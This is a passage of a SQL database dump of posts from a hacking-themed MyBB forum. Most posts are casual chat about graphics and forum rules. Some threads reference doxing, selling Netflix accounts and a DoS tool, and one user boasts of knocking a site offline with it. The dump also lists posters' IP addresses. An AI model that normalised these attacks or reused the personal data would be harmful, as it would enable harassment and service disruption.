'Sin Cara', '1345945181', 'Hmmmmm it\'s nice suggestion :)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', '6089e26e3983bb79c2d55f24b388065c', '0', '0'); INSERT INTO mybb_posts VALUES('988', '217', '882', '24', 'RE: [Fun] Find the SEX of your Computer...!!', '0', '90', 'duhuh', '1345945651', '[quote=\'Sin Cara\' pid=\'882\' dateline=\'1345868433\']\r\n\r\n\r\nguyyyyyzzzzzzzz its really funny..:roflol::roflol::roflol:\r\n[/quote]\r\n\r\nyou should get out more lol, i would love to know what would happen if a realy girl spoke to you, probably laugh in there face:P', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '49a43de58f4b8e1dad74b68f12916eb8', '0', '0'); INSERT INTO mybb_posts VALUES('989', '195', '957', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345946924', '[quote=\'t3h jok3r\' pid=\'957\' dateline=\'1345936052\']\r\n[quote=\'iTzIpod\' pid=\'924\' dateline=\'1345916462\']\r\nUpdated thread. Added Thread Design. xD I failed at the Contact Info part.\r\n[/quote]\r\n\r\nNice thread design. Mistakes happen, but you patched it.\r\n[/quote]\r\n\r\nThanks. That was my first Thread Design. It was very fun trying to make it :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5850683cfa91bfb6b32b094d2e5da69c', '0', '0'); INSERT INTO mybb_posts VALUES('990', '219', '966', '35', 'RE: My Designs', '0', '82', 'iTzIpod', '1345947036', '[quote=\'t3h jok3r\' pid=\'966\' dateline=\'1345936938\']\nI feel jealous now. You have more awards than me.\n[/quote]\n\nWe both got the same number of awards.', '24.212.197.164', '416597412', '1', '0', '82', '1345948224', '1', 'edef8d9a0c482ad04603996d889cc809', '0', '1345948224'); INSERT INTO mybb_posts VALUES('991', '230', '984', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345948385', '[quote=\'Sin Cara\' pid=\'984\' dateline=\'1345942431\']\r\n[quote=\'iTzIpod\' pid=\'944\' dateline=\'1345922950\']\r\n[quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\']\r\n[quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\']\r\nAlright\r\nThere are probably more.\r\nSome links are unknown Some links are broken. \r\n[Spoiler]\r\nhttp://www.ajoyfulheart.com/pspphot...shresources.htm\r\nhttp://www.smashingmagazine.com/2007/01%C3%83...tutorials/\r\nhttp://graphicssoft.about.com/od/illust%C3%83...lrings.htm\r\nhttp://www.adobe.com/support/fireworks/%C3%83...index.html\r\nhttp://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts\r\n[/Spoiler]\r\n[/quote]\r\n\r\nThe links are dead because of server is down.\r\n[/quote]\r\nAdobe is down? Are you sure? \r\n\r\nIt is up. It doesn\'t work because of the ... in the URL. -.- Fix them\r\n[/quote]\r\n\r\nThe dead links are removed now ;)\r\n[/quote]\r\n\r\nThanks for taking the time to do so. ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ac4ebabc8236e0b04a83096d241a780', '0', '0'); INSERT INTO mybb_posts VALUES('992', '213', '953', '58', 'RE: What group(s) would you like to see?', '0', '82', 'iTzIpod', '1345948530', '[quote=\'t3h jok3r\' pid=\'953\' dateline=\'1345935403\']\r\n[quote=\'iTzIpod\' pid=\'878\' dateline=\'1345867692\']\r\nI would like to see a comic/troll group. I will be filling out the application tomorrow and post it on the other thread. =]\r\n\r\nWill be looking for a co - leader too.\r\n[/quote]\r\n\r\nTroll groups are not accepted. >:)\r\n\r\nI will take a look at your application in a while.\r\n[/quote]\r\nOh all right. :p I made a Unique Usergroup instead. Well. I made an application. Hoping it to become official!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83528770b6b6950f5cd9f032b92973d2', '0', '0'); INSERT INTO mybb_posts VALUES('993', '233', '968', '58', 'RE: Reviewers Group???', '0', '82', 'iTzIpod', '1345948629', 'Marketplace isn\'t active at the moment. So I don\'t think now is a good time. Although maybe in the future, this suggestion will be good. But not now.\n\n-----------------------------------\nOr if we add that suggestion, the Marketplace will become active? :o \n\nWho knows?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '314b6fe042039a89547241926e09511a', '0', '0'); INSERT INTO mybb_posts VALUES('994', '79', '975', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345949251', '[quote=\'t3h jok3r\' pid=\'975\' dateline=\'1345937849\']\r\nGuts? Well OK, I would also think twice before doing this.\r\n[/quote]\r\n\r\nYeah. I wanna be like a Ninja and don\'t get caught. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1125d0a60dff7efbd4f770dfdb038ec', '0', '0'); INSERT INTO mybb_posts VALUES('995', '130', '981', '15', 'RE: Skype IP Finder - FREE', '0', '82', 'iTzIpod', '1345949340', '[quote=\'t3h jok3r\' pid=\'981\' dateline=\'1345940956\']\r\nOh I see. Finally one of my giveaways were useful for a moment.\r\n[/quote]\r\n\r\nWait so this no longer works? Even with your API in the + Section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e11501340019a14af9f4b1567751a09c', '0', '0'); INSERT INTO mybb_posts VALUES('996', '29', '83', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '82', 'iTzIpod', '1345949449', 'Seems legit. Will give it a try and attempt to knock off TP.. t3h jok3r Lmfao\n[hr]\nEDIT: Works! t3h jok3r I did it! :D\n\n\n\n[img]http://i.imgur.com/4axu8.png[/img]\n\nWoot\n\n\nEDIT: t3h jok3r. It came back on after 3 minutes.. -.-', '24.212.197.164', '416597412', '1', '0', '82', '1345956482', '1', '87adb234f675ec9e32682d8fedc5920e', '0', '1345956482'); INSERT INTO mybb_posts VALUES('6939', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1351894937', 'Updated thread. Will be doing this for the first 3 posters below me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '661e545a67c55fc11bb53b53816d3f2e', '0', '0'); INSERT INTO mybb_posts VALUES('6940', '719', '3646', '16', 'RE: AstroPID Clean', '0', '82', 'iTzIpod', '1351894979', 'Pictures? :p Just knowing that you got DOXed and all. I can\'t trust you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f07cce68672e7c58f89091af5ed7917', '0', '0'); INSERT INTO mybb_posts VALUES('6941', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '62', 'R?????zo?', '1351895370', 'I\'m interested if you could help me :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4f729ef34de3b6c5cc7e8ebad6aa0f7f', '0', '0'); INSERT INTO mybb_posts VALUES('998', '226', '919', '11', 'RE: A Newbies Guide', '0', '82', 'iTzIpod', '1345949816', 'Nice guide =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88ba3861d4423072e031e832c93a3652', '0', '0'); INSERT INTO mybb_posts VALUES('999', '207', '776', '3', 'RE: Suggest awards and apply for awards', '0', '82', 'iTzIpod', '1345949937', '@Apathy, will you ever consider adding any awards soon? \n\nWe got quite a few suggestions that are really good. \n\n\nPost Whore\nRep Whore\nNewbie Hacker\nTrusted\n[hr]\nAward Name: Trusted/Trusted Award\nAward Description: Self-explanatory. \nHow to obtain: This award is given to those members who are trusted and have high rep in the community. \nAward Icon: http://i.imgur.com/Mosfz.png [img]http://i.imgur.com/Mosfz.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345950260', '1', '33142b11a3ec616ab468417bde07daa6', '0', '1345950260'); INSERT INTO mybb_posts VALUES('1076', '221', '900', '7', 'RE: L33t Hacking Advertisement Video', '0', '1', 't3h jok3r', '1346015895', 'No problem, glad to see you got things worked out.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '304f61cd0b5dfe73943f209008bd5f60', '0', '0'); INSERT INTO mybb_posts VALUES('1077', '241', '1058', '49', 'RE: [Suggestion] Questions Section', '0', '1', 't3h jok3r', '1346016098', '[quote=\'JakeUS\' pid=\'1058\' dateline=\'1345992133\']\r\nYou can just ask questions through private messages or the rules and announcements section.\r\n[/quote]\r\n\r\nI agree with this. Plus when a Moderator, Staff or Admin answers the thread, the thread will be closed unless they leave it open for further discussions. Now for example, if we do this then maybe people post their feedback then after a Mod saying for example \"LH is really a nice site etc\" then the thread gets closed auto then it will be messed up because it\'s a misc discussion thread, not a question.\r\n\r\nAlso cross posting means creating the same thread with same subject(topic) more than once.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '7cf94883171e9343a09076b2555143bb', '0', '0'); INSERT INTO mybb_posts VALUES('1001', '233', '968', '58', 'RE: Reviewers Group???', '0', '2', 'Apathy', '1345950871', 'Not needed we do not have enough active members', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '06e13163da68745c4bee74af2210a350', '0', '0'); INSERT INTO mybb_posts VALUES('1002', '236', '0', '49', '[Suggestion] Reporting Posts', '0', '82', 'iTzIpod', '1345951020', 'Hey LH, \r\nAnother suggestion. \r\n\r\nSo anyways, if you report a post, you will have the option to pick a reason why you want to report it. \r\nBut, with this suggestion, you are allowed to report a post by choosing one of the options. And also explaining how it is -insert reason here-.\r\n\r\n\r\nFor example\r\n\r\n\r\nA user named tnl4utlgn43gn34ide made a post on this thread.\r\nAnd the post was: \";a;a;aaafaf spammng yay. free posts.\"\r\nAnd I happen to see that post and so I report it for \"SPAM\"\r\nAnd then I write a little message to a Mods/SMods/Admins explaining why I reported that post and also how it is SPAM.\r\n\r\nThat way it would be a lot easier for the Mods/SMods/Admins to view and moderate the forum.\r\n\r\nNOTE: Please have good grammar though. And make sure your spelling and everything makes sense. Otherwise we won\'t be able to understand why you reported that post.\r\n\r\nAgree?\r\n\r\nDisagree?\r\n\r\nDiscuss.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7a691a963a9b0b5f42ec008ba4cb17a8', '0', '0'); INSERT INTO mybb_posts VALUES('1003', '236', '1002', '49', 'RE: [Suggestion] Reporting Posts', '0', '2', 'Apathy', '1345951081', 'When did you become mod?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '2c1d59b350bc963445c497560ac3b6aa', '0', '0'); INSERT INTO mybb_posts VALUES('1005', '219', '888', '35', 'RE: My Designs', '0', '2', 'Apathy', '1345951214', 'The second one looks like just c4d spam with a render pasted on and a light soft brush. :3 keep working at it.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '8305bc164a20982a87d3e7d2f30d868a', '0', '0'); INSERT INTO mybb_posts VALUES('1006', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '82', 'iTzIpod', '1345951240', 'Agreed with Timmy. Lmfao.\n\n\nDid someone say \"Ipod\"?!?!??!? :D\n\nHave no fear, iTzIpod is here. =]\n\nOT: I don\'t get this? \n\nWait.. I don\'t know how to code.', '24.212.197.164', '416597412', '1', '0', '82', '1345951377', '1', 'b7ec83c74db928136125f0716eb42498', '0', '1345951377'); INSERT INTO mybb_posts VALUES('1007', '210', '835', '3', 'RE: Moved Successfully!!!', '0', '2', 'Apathy', '1345951282', 'Good.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '5c691537e38dac6edefb46d74c5bd904', '0', '0'); INSERT INTO mybb_posts VALUES('1008', '212', '930', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345951404', '[quote=\'iTzIpod\' pid=\'930\' dateline=\'1345918349\']\r\n[quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\']\r\nSo are you going to make it official????\r\n[/quote]\r\nt3h jok3r is probably busy today. \r\n\r\nOT: \r\n[b]Name of group:[/b] Unique\r\n[b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. \r\n[b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img]\r\n[b]Forum Name:[/b] Unique Headquarters\r\n[b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img]\r\n[b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.\r\n[/quote]\r\n\r\nInteresting idea but ficon is not unique... I will make one if you want.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'ef93f8dae3db873b3b530a833e2e9e1a', '0', '0'); INSERT INTO mybb_posts VALUES('1009', '235', '980', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1345951506', 'Not a question, but, it feels great to be a Moderator on an awesome forum. I was Moderator on a lot of forums. But this one is actually a great forum.\nSo far, my journey as a Mod on LH is great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5aa968dc386b0b3f7f5863945ffb22ea', '0', '0'); INSERT INTO mybb_posts VALUES('1010', '237', '0', '35', 'My attempt at a smudge tag [learning]', '0', '2', 'Apathy', '1345951622', 'What do you guys think:\r\n\r\n[IMG]http://i.imgur.com/e9Obu.png[/IMG]\r\n\r\nI think it alright.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '239efba5c795cf48693e2c103425f58d', '0', '0'); INSERT INTO mybb_posts VALUES('1011', '134', '964', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345951666', '[quote=\'t3h jok3r\' pid=\'964\' dateline=\'1345936834\']\r\n[quote=\'iTzIpod\' pid=\'901\' dateline=\'1345904080\']\r\nReferred 4 members so far. Will be referring more!\r\n[/quote]\r\n\r\n\r\nThanks for referring. 6 left.\r\n[/quote]\r\n\r\n5 Now. =]\r\n\r\n\r\nWon\'t take long.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44581e541a706014143a7c04eca95238', '0', '0'); INSERT INTO mybb_posts VALUES('1013', '221', '963', '7', 'RE: L33t Hacking Advertisement Video', '0', '82', 'iTzIpod', '1345951774', '[quote=\'t3h jok3r\' pid=\'963\' dateline=\'1345936818\']\r\nThe code you are using is \r\n\r\n[code]\r\n[video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\r\n[/code]\r\n\r\nThe code you should be using is\r\n\r\n[code]\r\n[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\r\n[/code]\r\n\r\nSo it will look like\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=yA2swuq4YsM[/video]\r\n[/quote]\r\n\r\nAh I see. My apologies. It was like [video=youtube;yA2swuq4YsM]http://www.youtube.com/watch?v=yA2swuq4YsM[/video] on other forums..\r\n\r\nBut, I will update the thread now. \r\n\r\nThanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a7833ee8c602b7857a9213948704f03e', '0', '0'); INSERT INTO mybb_posts VALUES('1014', '197', '982', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345951970', '[quote=\'t3h jok3r\' pid=\'982\' dateline=\'1345941178\']\n[quote=\'iTzIpod\' pid=\'898\' dateline=\'1345900864\']\n[quote=\'t3h jok3r\' pid=\'894\' dateline=\'1345898969\']\n* t3h jok3r likes the cookie. Can I have more?\n[/quote]\n\n* iTzIpod slaps t3h jok3r with a fish for asking for more cookies without saying please. :p\n[/quote]\n\n* t3h jok3r cries for being slapped with a [s]dick[/s] fish. \n\n[b]Was it funny? I wish I could get the jokester award :D[/b]\n[/quote]\n\n\n/me laughs at the bolded text.\n\n\nxD Jokes.\n\nDid you mean fish\'s dick? :o', '24.212.197.164', '416597412', '1', '0', '82', '1345952004', '1', '46f1c282c4220340ebf9567e83592571', '0', '1345952004'); INSERT INTO mybb_posts VALUES('1015', '237', '1010', '35', 'RE: My attempt at a smudge tag [learning]', '0', '82', 'iTzIpod', '1345952107', 'Agreed with you. It\'s alright. =] Very good for beginner. \n\nDid you follow a tutorial?\n\nI suggest you work on the colors. And then smudge them all together.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2289b595752179baaebe17c3f30352a0', '0', '0'); INSERT INTO mybb_posts VALUES('1016', '219', '1005', '35', 'RE: My Designs', '0', '82', 'iTzIpod', '1345952188', '[quote=\'Apathy\' pid=\'1005\' dateline=\'1345951214\']\r\nThe second one looks like just c4d spam with a render pasted on and a light soft brush. :3 keep working at it.\r\n[/quote]\r\n\r\n:p\r\n\r\nIt still looks cool though don\'t you think?\r\n\r\nDo you want to see the .PSD of it?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ce1f156fddee5b14826f438f32d97248', '0', '0'); INSERT INTO mybb_posts VALUES('1017', '236', '1003', '49', 'RE: [Suggestion] Reporting Posts', '0', '82', 'iTzIpod', '1345952338', '[quote=\'Apathy\' pid=\'1003\' dateline=\'1345951081\']\nWhen did you become mod?\n[/quote]\n\nYesterday. t3h jok3r was desperately begging me to be Mod.\n\n\nJokes aside\n\n[removed] \n[hr]\nEDIT: Whoops. Wrong section.', '24.212.197.164', '416597412', '1', '0', '1', '1346015549', '1', '7e8454094c94c7b0a0af1fcb489b8323', '0', '1346015549'); INSERT INTO mybb_posts VALUES('1018', '237', '1015', '35', 'RE: My attempt at a smudge tag [learning]', '0', '2', 'Apathy', '1345952441', '[quote=\'iTzIpod\' pid=\'1015\' dateline=\'1345952107\']\nAgreed with you. It\'s alright. =] Very good for beginner. \n\nDid you follow a tutorial?\n\nI suggest you work on the colors. And then smudge them all together.\n[/quote]\n\nNo tutorial just me.\n\nI an no beginner... Just at smudging.... The colors are fine. Thanks for the feed back.', '70.53.236.250', '1177939194', '0', '0', '2', '1345952521', '1', '87ef1f1d22072a74fff17d26456eb411', '0', '1345952521'); INSERT INTO mybb_posts VALUES('1019', '237', '1018', '35', 'RE: My attempt at a smudge tag [learning]', '0', '82', 'iTzIpod', '1345952881', '[quote=\'Apathy\' pid=\'1018\' dateline=\'1345952441\']\r\n[quote=\'iTzIpod\' pid=\'1015\' dateline=\'1345952107\']\r\nAgreed with you. It\'s alright. =] Very good for beginner. \r\n\r\nDid you follow a tutorial?\r\n\r\nI suggest you work on the colors. And then smudge them all together.\r\n[/quote]\r\n\r\nNo tutorial just me.\r\n\r\nI an no beginner... Just at smudging.... The colors are fine. Thanks for the feed back.\r\n[/quote]\r\n\r\nLet me rephrase my post above. \r\n\r\nI meant\r\nIt was very good for a beginner smudger. \r\n\r\n-------------------------------------\r\n\r\n\r\nAlso, \r\n\r\nit was just a suggestion about the colors. And it is your work. Not mine. So you get to decide what is on it and what is not. \r\nGood luck smudging. Have fun too..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4507ba864926bca5e6d7a7743a66339c', '0', '0'); INSERT INTO mybb_posts VALUES('1020', '212', '1008', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345952955', '[quote=\'Apathy\' pid=\'1008\' dateline=\'1345951404\']\r\n[quote=\'iTzIpod\' pid=\'930\' dateline=\'1345918349\']\r\n[quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\']\r\nSo are you going to make it official????\r\n[/quote]\r\nt3h jok3r is probably busy today. \r\n\r\nOT: \r\n[b]Name of group:[/b] Unique\r\n[b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. \r\n[b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img]\r\n[b]Forum Name:[/b] Unique Headquarters\r\n[b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img]\r\n[b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.\r\n[/quote]\r\n\r\nInteresting idea but ficon is not unique... I will make one if you want.\r\n[/quote]\r\n\r\nI would appreciate it if you make me one! =] \r\nThanks in advance Apathy!\r\n\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0c6b41956b688dd83e225f8a73373ee3', '0', '0'); INSERT INTO mybb_posts VALUES('1021', '238', '0', '56', 'Ban the user above you', '0', '82', 'iTzIpod', '1345953707', 'This is a fairly popular forum game. \r\nBasically, you ban the user who posted above you. But you have to include a reason why.\r\n\r\nExample:\r\n\r\nUser 1: \r\nbanned for starting thread.\r\nUser 2:\r\nBanned for not starting with a capital\r\nUser 3: \r\nBanned for not ending with a period.\r\n\r\nEtc.', '24.212.197.164', '416597412', '1', '0', '82', '1345953894', '1', 'b5d2fa198c4596491468cf15697d58ac', '0', '1345953894'); INSERT INTO mybb_posts VALUES('1022', '239', '0', '7', '1000th Post', '0', '82', 'iTzIpod', '1345954747', 'Hey LH, \nI would like to congratulate L33t Hacking on 1000 posts.\nAfter 2 months and 12 days, we finally achieved a Forum Goal of 1000 posts. \nI would like to thank all the members who have posted and participated in this forum. Without you, this wouldn\'t happen. \n\n\n\n\nCONGRATULATIONS L33T HACKING ON 1000 POSTS. ONCE A L33T, ALWAYS A L33T.\n\n\n\nImages:\n\n999 Posts before the thread was made:\n[img]http://i.imgur.com/mvPxZ.png[/img]\n\n1000 Posts after the thread was made:\n[img]http://i.imgur.com/tWtWF.png[/img]', '24.212.197.164', '416597412', '1', '0', '82', '1345955133', '1', '193bfdc365f5bcf623eb4977a05b5a64', '0', '1345955133'); INSERT INTO mybb_posts VALUES('1023', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345956488', 'You are most welcome Bro!', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'f6ab287ba82afdc3143b9a7ee597b88a', '0', '0'); INSERT INTO mybb_posts VALUES('1024', '226', '998', '11', 'RE: A Newbies Guide', '0', '54', 'Sin Cara', '1345956558', '[quote=\'iTzIpod\' pid=\'998\' dateline=\'1345949816\']\r\nNice guide =]\r\n[/quote]\r\n\r\nyou are welcome Bro ;)', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'cdde032676356e8b19efcbf6ab9c5a7b', '0', '0'); INSERT INTO mybb_posts VALUES('1074', '25', '1050', '19', 'RE: Blackhat System Scanner', '0', '1', 't3h jok3r', '1346015663', '[quote=\'BurnsH4X\' pid=\'1050\' dateline=\'1345986015\']\r\ny dose avg say its a virus?\r\n[/quote]\r\n\r\nI have no idea why, it\'s a clean program. I use it as well, you can also download it from the official Vulcan Tools website.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '80e054377525bf8f7f5da7e57503d1d7', '0', '0'); INSERT INTO mybb_posts VALUES('1025', '240', '0', '3', '[Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1345957663', 'I noticed the section [url=http://l33thacking.com/forumdisplay.php?fid=50]Complaints & Rep Abuse Support[/url] was supposed to be a Private Section meaning only [b]YOU[/b] can see your threads.\r\nAnd when I was a normal member, I noticed that I could view threads in there. \r\n\r\nPlease fix this issue. \r\n\r\nComplaints & Rep Abuse Support\r\nHave a complaint against someone? Need to report a valid rep abuse? [b]You can only view your own threads. [/b]\r\n\r\n\r\nFix that please. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '556acdcec0334ed6cf5e5b72ee8666e0', '0', '0'); INSERT INTO mybb_posts VALUES('1026', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345957891', 'Aight iTzIpof banner indefinitely because I can :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '82046199c9ce837283ccff77df08993b', '0', '0'); INSERT INTO mybb_posts VALUES('1027', '239', '1022', '7', 'RE: 1000th Post', '0', '2', 'Apathy', '1345957932', 'Lol yay.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'bc38b12c781b0106cd2f2c87c0d520b9', '0', '0'); INSERT INTO mybb_posts VALUES('1028', '241', '0', '49', '[Suggestion] Questions Section', '0', '82', 'iTzIpod', '1345958174', 'Hey LH, \nI am suggesting a Sub Forum in the Announcements, Feedback, Bugs and Suggestions Section.\nIn this section, you can ask an Admin. Any question or concerns about the forum. No trolling will be permitted. \n\n\nFor example:\n\nI want to ask t3h jok3r or Apathy a question about the rules.\nSo I make a New thread in that section. And then post my question. \nAnd then, my question is: \"On the \"[url=http://l33thacking.com/misc.php?action=help&hid=10] Warning System[/url]\" page, I noticed that I can receive a warning for the following:\n\nAdult Content (+20 points) \nCross Posting (+20 points) \nDisallowed Blackhat Activity (+30 points) \nDonation Begging (+10 points) \nInfected download or link (+25 points) \nLeeching (+20 points) \nNonsense (+10 points) \nOff topic or Unrelated (+10 points) \nPersonal Data (+15 points) \nProfile Violation (+15 points) \nReputation Abuse (+25 points) \nSPAM (+20 points) \nThreat or Harassment (+40 points) \nWrong Forum (+15 points) \n\nBut what do you mean by : Cross Posting (+20 points)?\n\n\nAnd then t3h jok3r or Apathy will reply to the thread with an answer.\nAnd then the thread will be closed.\n\n\nIf you are going to ask another question, you must make another thread.\n\nAlso, that example was actually why I suggested this. I didn\'t know what you meant by Cross Posting (+20 points).\n\n\nAnyways.\n\n\nAgree? \n\nDisagree?\n\nDiscuss.', '24.212.197.164', '416597412', '1', '0', '82', '1345959155', '1', '4ca28ef9d24dfee7be72905671ce5067', '0', '1345959155'); INSERT INTO mybb_posts VALUES('1029', '241', '1028', '49', 'RE: [Suggestion] Questions Section', '0', '2', 'Apathy', '1345958410', 'You seem to only want to talk to joker?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '240f95735f7590331ef5686459b09f89', '0', '0'); INSERT INTO mybb_posts VALUES('1030', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345958819', 'Banned for having a lot of spelling mistakes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fa4ec2c7e0282e7ee54a07817bc6566', '0', '0'); INSERT INTO mybb_posts VALUES('1031', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345958911', 'Benned for acusing tha admin of haveing mistiakes', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a12de1de1f14f262830a71effc307e22', '0', '0'); INSERT INTO mybb_posts VALUES('1032', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345958964', 'What type of thing would interest you?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '7090ba6b7e962b34eb42d676952e6b5b', '0', '0'); INSERT INTO mybb_posts VALUES('1033', '241', '1029', '49', 'RE: [Suggestion] Questions Section', '0', '82', 'iTzIpod', '1345959189', '[quote=\'Apathy\' pid=\'1029\' dateline=\'1345958410\']\r\nYou seem to only want to talk to joker?\r\n[/quote]\r\n\r\nWhat are you talking about?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '906eff5637c35f537cdb0f1ad8c82e98', '0', '0'); INSERT INTO mybb_posts VALUES('1034', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345959271', 'Banned for having bad grammar and spelling.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc012c464e73f87d21464f33d60b971a', '0', '0'); INSERT INTO mybb_posts VALUES('1035', '242', '0', '34', 'Will Smith Signature Tutorial', '0', '82', 'iTzIpod', '1345959364', '[img]http://i.minus.com/ibrTMUoRfSxOs5.png[/img]\r\nCredits: NEFantasy\r\nEnjoy! Good luck making it!', '24.212.197.164', '416597412', '1', '0', '82', '1346096176', '1', '01bb15cb7741cc6510adf37eba939941', '0', '1346096176'); INSERT INTO mybb_posts VALUES('1036', '243', '0', '34', 'Black Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1345959485', '[img]http://i.minus.com/iMoCpXvmdPm0U.png[/img]\r\nCredits: NEFantasy\r\nEnjoy! Good luck making the signature!', '24.212.197.164', '416597412', '1', '0', '82', '1346096134', '1', 'fee0b3bd11e3d75f8d936b2bc0088e91', '0', '1346096134'); INSERT INTO mybb_posts VALUES('1037', '212', '1032', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345959678', '[quote=\'Apathy\' pid=\'1032\' dateline=\'1345958964\']\r\nWhat type of thing would interest you?\r\n[/quote]\r\n\r\nAnything that makes it look professional and HQ and Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb8b81d7097b87f1211986c5283f900d', '0', '0'); INSERT INTO mybb_posts VALUES('1038', '238', '1034', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345959939', '[quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\']\r\nBanned for having bad grammar and spelling.\r\n[/quote]\r\n\r\nBanned for thinking I care enough about this thread to write properly. :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'f72a460a57ff0df758787682a23e0166', '0', '0'); INSERT INTO mybb_posts VALUES('1039', '238', '1038', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345960114', '[quote=\'Apathy\' pid=\'1038\' dateline=\'1345959939\']\r\n[quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\']\r\nBanned for having bad grammar and spelling.\r\n[/quote]\r\n\r\nBanned for thinking I care enough about this thread to write properly. :)\r\n[/quote]\r\n\r\nBanned for having good grammar and spelling.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c812ba61da66266892e41a0a05f07c46', '0', '0'); INSERT INTO mybb_posts VALUES('1040', '238', '1039', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1345960629', '[quote=\'iTzIpod\' pid=\'1039\' dateline=\'1345960114\']\r\n[quote=\'Apathy\' pid=\'1038\' dateline=\'1345959939\']\r\n[quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\']\r\nBanned for having bad grammar and spelling.\r\n[/quote]\r\n\r\nBanned for thinking I care enough about this thread to write properly. :)\r\n[/quote]\r\n\r\nBanned for having good grammar and 